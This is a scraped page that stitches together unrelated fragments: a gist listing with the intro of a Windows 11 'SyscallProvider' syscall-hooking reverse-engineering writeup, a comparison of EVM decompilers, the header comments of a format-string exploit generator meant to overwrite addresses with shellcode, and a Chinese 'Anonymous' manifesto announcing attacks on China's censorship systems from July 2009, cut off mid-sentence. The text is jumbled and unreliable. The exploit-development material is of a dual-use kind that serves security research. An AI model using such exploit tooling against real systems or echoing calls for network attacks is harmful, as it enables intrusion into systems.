SyscallProvider is a feature available from Windows 11 22H2, that allows for inline hooking of syscalls.
This unfinished research was done on Windows 11 22H2. The feature is fully undocumented at the moment and it looks like it's locked to Microsoft-signed drivers.
All of the information here was gathered by manual reverse engineering of securekernel.exe, skci.dll and ntoskrnl.exe.
The kernel exports three functions to work with the new feature: PsRegisterSyscallProvider, PsQuerySyscallProviderInformation, PsUnregisterSyscallProvider.
This writeup will explore how this feature is initialized, how it works internally, and how to interact with it and use it.
Tommy Jerry Mairo TommyJerryMairo
Kristal-g
/ SyscallProvider.md
Created
May 12, 2025 09:02
- Panoramix is probably the most well-known one thanks to etherscan.io integrating it. It'll return "python-like" code that is actually quite nice to read. Unfortunately it often ends up having "timeouts" causing the decompiled code to just abruptly stop.
- Dedaub's Decompiler is my personal favorite. When it produces something, it does produce "solidity-like" code that is well readable. But sometimes it just fails to yield anything at all. And even when it does work it struggles whenever memory handling gets involved, requiring some educated guessing.
- ethervm.io's Decompiler is another online service which similar to Panoramix always delivers a result, but it also has the tendency to skip big parts of the code due to "could not resolve jump destination" errors and the like.
- Heimdall does not have an online s
mgeeky
/ format_string_vuln_gen.py
Last active
May 17, 2025 05:06
Format String vulnerability input generator to be used during exploit development stage at constructing stable x86 (32bit) input vectors.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/python | |
| # | |
| # Script intended to aid exploit-development process, while attacking | |
| # format string vulnerabilities. This script attempts to generate a | |
| # stable format string to supply to vulnerable program, that would overwrite | |
| # specified address with specified shellcode. Generating such format string | |
| # by hand is a tedious task therefore this script shall make it easier. | |
| # Technical info: | |
| # - x86/32bit only, albeit it's easy to extend it to support 64bit (todo..) |
你好,中国政府网络审查部门。我们是匿名网民。长久以来,我们目视了你对互联网的所作所为。你对互联网言论自由的无端封锁,你对互联网先进技术的敌视,你勾结宣传喉舌对事实真相的扭曲,你运用网络评论员对网络舆论的的毒化,这些都深深地刻印在我们的记忆中。随着最近你绿坝强制安装的通知和对谷歌的恶毒诽谤的出炉,你全面控制全面审查互联网的险恶用心已经明白无误地展现在人们面前。我们匿名网民于此决定,我们将从2009年7月1日开始在全球范围内对你所控制的网络审查体系发起全面袭击。
为了保卫互联网的自由,为了推动人类网络化的前进,同时也为了我们自己的网络权利,我们将对你的网络审查体系进行系统性破坏并展现你所谓网络审查体系在真正网络力量之前的渺小。我们将你视为网络头号公敌。我们对你发起的将是持久战。无论你如何利用宣传喉舌愚弄舆论,你终将湮没在人民战争的汪洋大海之中。你古板的宣传手段,你文革般陈旧口号式的叫嚣,你对互联网的无知,你“为了下一代”之类的虚伪说辞,这些都为你的彻底失败敲响了丧钟。你无处可逃,因为我们无处不在。国家暴力机器不能拯救你,因为我们每一个成员的倒下,都意味着另外十名新成员的加入。我们清楚地意识到你会运用你惯常的阶级斗争伎俩,在你的蛊惑宣传中赋予我们“不明真相群众”的标签在我们与普通民众之间划出界线,然后赋予我们“少数不法分子”的标签在我们内部划出界线,最终各个击破。对我们来说,这是可以接受的。事实上,这是我们所鼓励的。原因很简单,你越这样看待你的人民,你皇帝新装的美丽就越不言自喻。
随着人类网络文明的发展,处于优势地位的统治阶级敌视网络化的陈旧意识形态逐渐成为历史发展进步的阻碍。旧意识形态势力对新兴网络势力的诬蔑和压迫,对网络世界的敌视和封锁,这些都表明了他们对于历史潮流的恐惧,都将成为他们在退出历史舞台之前的最后挣扎。那些妄图在历史车轮面前螳臂挡车的,都将最终被扫进历史的垃圾堆。即使你的血液正在得到数字移民的缓慢补充,你在可见的未来将仍然无法理解网络。我们会欣赏你对于异己几十年不变的阴谋论观点和文革口号文风,因为我们也会有怀旧的心情;我们也将笑谈你试图在互联网上划出国界的举动,因为愚蠢行为从来都是史书中的笑点。不过我们可以真诚地告诉你:
没有人想要更迭你的政权,我们对你陈旧的政权概念和意识形态烂腌菜毫不感兴趣。你无法理解在人类网络化的历史潮流之前宏大叙事为何而消解,你也无法理解国家和民族概念为何将分崩离析,你无法